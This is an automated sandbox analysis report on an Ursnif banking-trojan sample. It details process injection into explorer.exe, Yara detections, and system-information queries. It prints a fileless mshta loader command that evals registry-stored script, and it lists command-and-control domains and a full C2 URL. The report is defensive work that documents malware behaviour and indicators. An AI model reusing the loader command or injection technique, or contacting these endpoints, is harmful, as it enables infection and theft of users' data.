Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES7BB2.tmp' 'c:\Users\user\AppData\Local\Temp\jnnfehtw\CSC5C15B44BFF13433EA0F7DE991C56E45D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9024.tmp' 'c:\Users\user\AppData\Local\Temp\idzehqcm\CSCED83507F240441029C9C6A47F2CB5CFA.TMP'
Source: C:\Windows\System32\control.exe Process created: unknown unknown
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: explorer.exe, 00000025.00000000.456640117.00000000089FF000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.435568781.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.444062037.000001E765260000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000025.00000000.432158802.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.435568781.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.444062037.000001E765260000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000025.00000000.432158802.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.435568781.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.444062037.000001E765260000.00000002.00000001.sdmp Binary or memory string: SProgram Managerl
Source: explorer.exe, 00000025.00000000.431964628.0000000001128000.00000004.00000020.sdmp Binary or memory string: ProgmanOMEa
Source: explorer.exe, 00000025.00000000.432158802.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.435568781.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.444062037.000001E765260000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd,
Source: explorer.exe, 00000025.00000000.432158802.0000000001640000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000026.00000000.435568781.000002413A990000.00000002.00000001.sdmp, RuntimeBroker.exe, 00000027.00000000.444062037.000001E765260000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001CA12A cpuid 1_2_001CA12A
Queries the installation date of Windows
Source: C:\Windows\SysWOW64\regsvr32.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_00E55F90 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError, 1_2_00E55F90
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001C12E8 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 1_2_001C12E8
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001CA12A wsprintfA,RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree, 1_2_001CA12A
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 1_2_001C7A5D CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 1_2_001C7A5D
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.342289663.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342468816.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.578433552.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.570719578.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342346721.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.412411530.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342261211.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.422060985.0000021EAC2F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.422165478.0000028E65B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.436183951.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.432265518.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342443739.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342379670.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.352943845.000000000519B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.574832418.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.437313666.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.589013804.00000000066DE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.474554725.00000000001CE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342460182.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342426080.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5236, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4616, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6684, type: MEMORY

Remote Access Functionality:

barindex
Yara detected Ursnif
Source: Yara match File source: 00000001.00000003.342289663.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342468816.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.578433552.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.570719578.000001E7666AE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342346721.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.412411530.0000000000500000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342261211.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000003.422060985.0000021EAC2F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000003.422165478.0000028E65B80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.436183951.0000000000E50000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.432265518.0000000003070000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342443739.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342379670.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.352943845.000000000519B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.574832418.000002413CA4E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.437313666.0000000003B8E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.589013804.00000000066DE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000022.00000002.474554725.00000000001CE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342460182.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.342426080.0000000005318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4288, type: MEMORY
Source: Yara match File source: Process Memory Space: RuntimeBroker.exe PID: 4016, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5236, type: MEMORY
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 4616, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 6684, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 353290 Sample: SecuriteInfo.com.Generic.mg... Startdate: 16/02/2021 Architecture: WINDOWS Score: 100 72 Found malware configuration 2->72 74 Malicious sample detected (through community Yara rule) 2->74 76 Antivirus detection for URL or domain 2->76 78 9 other signatures 2->78 9 loaddll32.exe 1 2->9         started        11 mshta.exe 2->11         started        process3 signatures4 14 regsvr32.exe 2 9->14         started        17 cmd.exe 1 9->17         started        96 Suspicious powershell command line found 11->96 19 powershell.exe 11->19         started        process5 file6 98 Writes to foreign memory regions 14->98 100 Allocates memory in foreign processes 14->100 102 Modifies the context of a thread in another process (thread injection) 14->102 112 2 other signatures 14->112 22 control.exe 14->22         started        25 iexplore.exe 1 84 17->25         started        54 C:\Users\user\AppData\...\jnnfehtw.cmdline, UTF-8 19->54 dropped 56 C:\Users\user\AppData\Local\...\idzehqcm.0.cs, UTF-8 19->56 dropped 104 Injects code into the Windows Explorer (explorer.exe) 19->104 106 Maps a DLL or memory area into another process 19->106 108 Compiles code for process injection (via .Net compiler) 19->108 110 Creates a thread in another existing process (thread injection) 19->110 27 csc.exe 19->27         started        30 csc.exe 19->30         started        32 conhost.exe 19->32         started        signatures7 process8 file9 88 Changes memory attributes in foreign processes to executable or writable 22->88 90 Injects code into the Windows Explorer (explorer.exe) 22->90 92 Writes to foreign memory regions 22->92 94 4 other signatures 22->94 34 explorer.exe 22->34 injected 38 iexplore.exe 154 25->38         started        40 iexplore.exe 29 25->40         started        42 iexplore.exe 29 25->42         started        44 iexplore.exe 29 25->44         started        58 C:\Users\user\AppData\Local\...\jnnfehtw.dll, PE32 27->58 dropped 46 cvtres.exe 27->46         started        60 C:\Users\user\AppData\Local\...\idzehqcm.dll, PE32 30->60 dropped 48 cvtres.exe 30->48         started        signatures10 process11 dnsIp12 62 c56.lepini.at 34->62 80 Changes memory attributes in foreign processes to executable or writable 34->80 82 Writes to foreign memory regions 34->82 84 Allocates memory in foreign processes 34->84 86 4 other signatures 34->86 50 RuntimeBroker.exe 34->50 injected 52 RuntimeBroker.exe 34->52 injected 64 img.img-taboola.com 38->64 66 tls13.taboola.map.fastly.net 151.101.1.44, 443, 49742, 49743 FASTLYUS United States 38->66 70 9 other IPs or domains 38->70 68 api10.laptok.at 34.65.144.159, 49759, 49760, 49761 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG United States 40->68 signatures13 process14
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
34.65.144.159
 unknown United States
139070 GOOGLE-AS-APGoogleAsiaPacificPteLtdSG false
104.20.185.68
 unknown United States
13335 CLOUDFLARENETUS false
151.101.1.44
 unknown United States
54113 FASTLYUS false

Private
IP
192.168.2.1

Contacted Domains

Name IP Active
contextual.media.net 184.30.24.22 true
tls13.taboola.map.fastly.net 151.101.1.44 true
hblg.media.net 184.30.24.22 true
c56.lepini.at 34.65.144.159 true
lg3.media.net 184.30.24.22 true
geolocation.onetrust.com 104.20.185.68 true
api10.laptok.at 34.65.144.159 true
web.vortex.data.msn.com unknown unknown
www.msn.com unknown unknown
srtb.msn.com unknown unknown
img.img-taboola.com unknown unknown
cvision.media.net unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://api10.laptok.at/api1/mOmUNrUT1Tkf_/2Fpjx5UP/NjKT2TUVc9KVEb1kN7jSv_2/Bku6FvO8M8/iUmLw2_2FTDrkr5tf/cCMI7qZIJsl5/daUh7ottHLc/7HVIrVoY1SieQv/lhrGpaJPPzKF03EAwxNqA/D874ye_2FRUsy2K6/xciFCEzbH51FFw_/2Bb8QoHf6NpN75pZ5G/Mu_2BbqUp/c75ragbUEKlE0l1LX_2F/4u83BFS0FCNHpZrX6b9/sd4d4jezfNsCefQ_2B6iCK/p1XgqNgeBsVt9/izg8Zsvz/1FaNRSjvruwthZY1A7QfFWz/_2BhfXLKTN/ZLkri3_2BI/e8SUozS false
  • Avira URL Cloud: safe
 unknown